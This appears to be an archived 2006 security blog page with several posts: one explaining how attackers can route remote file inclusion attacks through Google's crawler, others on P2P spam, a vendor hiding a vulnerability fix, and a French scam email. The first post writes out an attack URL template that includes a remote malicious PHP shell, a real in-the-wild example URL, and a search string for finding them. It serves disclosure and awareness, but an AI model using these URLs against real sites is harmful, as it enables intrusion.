November 2006

Anonymizing RFI Attacks Through Google

google can be utilized to hack into websites – actively exploiting them (not information gathering by the use of “google hacking”, although that is how most of the sites vulnerable to rfi attacks are found).

by placing a url on any web page, google will find it, visit it and then index it. with this mechanism, it is possible to anonymize attacks on third party web sites through google by the use of its crawler.

poc –
a malicious web page is constructed by an attacker, containing a url built like so:
1. third party site uri to attack.
2. file inclusion exploit.
3. second uri containing a malicious php shell.

example url:
http://victim-site/rfi-exploit?http://uri-with-malicious-code.php

google will harvest this url, visit the site using its crawler and index it.
meaning accessing the target site with the url it was provided and exploiting it unwittingly for whoever planted it. it’s a feature, not a bug.

this is currently exploited in the wild. for example, try searching google for:
inurl:cmd.gif

and note, as an example:
www.toomuchcookies.net/index.php?s=http:/%20/xpl.netmisphere2.com/cmd.gif?cmd
which is no longer vulnerable. the %20 seems out of place, but this is how it is shown in the search.

why use a botnet when one can abuse the google crawler, which is allowed on most web sites?

notes:
1. this attack was verified on google, but there is no reason why it should not work with other search engines, web crawlers and web spiders.
2. file inclusions seem to tie in well with this attack anonymizer, but there is no reason why others attack types can’t be used in a similar fashion.
3. the feature might also be used to anonymize communication, as a covert channel.

noam rathaus.
(with thanks to Sun Shine and lev toger)

P2P as a new spam medium, moving from PoC to full operations

spam on p2p networks used to be mainly with advertising inside downloaded movies and pictures (mainly pornographic in nature), as well as by hiding viruses and other malware in downloaded warez and most any other file type (from zip archives to movie files). further, p2p networks were in the past used for harvesting by spammers.
today, p2p has become a direct to customer spamvertizing medium. this has been an ongoing change for a while. as we speak, it is moving from a proof of concept trial to a full spread of spam, day in, day out.
the idea is not new, but now it is becoming serious.

some choice picks:
ebook – googlecash – make money using google (learn to use affiliate programs to make easy money).pdf [i’ve been made aware this one is a real, yet pirated, book. call it a false positive]
us banks acounts information [dir]
how to create an automated ebay money machine.pdf
easy chair millionaire review.pdf
press equalizer review – flood your site with targeted traffic, achieve top rankings and gain dozens or more backlinks.pdf
top home based jobs [dir]

and so on. these are just some of the scams now being pushed over p2p.

we discussed this before; it started with fake books on the subject of online marketing, and now it has gone all the way to spammers/phishing/”affiliate programs”/spyware (or in other words online fraud related organized crime groups) looking for new ways and mediums by which to reach target audience, with email becoming more and more scrutinized and filtered.

FunnySad side of security

Reading through Zero Day Initiative’s (ZDI) advisory: Verity Ultraseek Request Proxying Vulnerability, I noticed that they mentioned that the vendor:

Verity has issued an update to correct this vulnerability. More details can be found at: http://www.ultraseek.com/support/docs/RELNOTES.txt

but going to the release notes you can quickly see that there is no mentioning of this vulnerability, nor the words Security/Vulnerability is ever mentioned in the advisory.

This could mean either of the two, ZDI’s advisory is incorrect, or Ultraseek decided to hide the fact that the vulnerability ever existed, I am assuming the latter.

This is of course saddening, no user of Ultraseek reading the release notes will ever know that the problem existed, unless they look up ZDI’s advisory.

Food for thought…

419 French (Polite) Spam

I got this polite spam which is the French version of the infamous Nigerian 419 (if that’s what it is, it lacks a dead relative.):

Bonjour,
Je me présente je suis Madame Delanoë, la collaboratrice directe d’Annie Dupas étoile d’or de la voyance 2006.

Je vous contacte car vous avez été tiré au sort et vous avez la chance de pouvoir bénéficier d’une voyance par e-mail totalement gratuite avec Annie Dupas.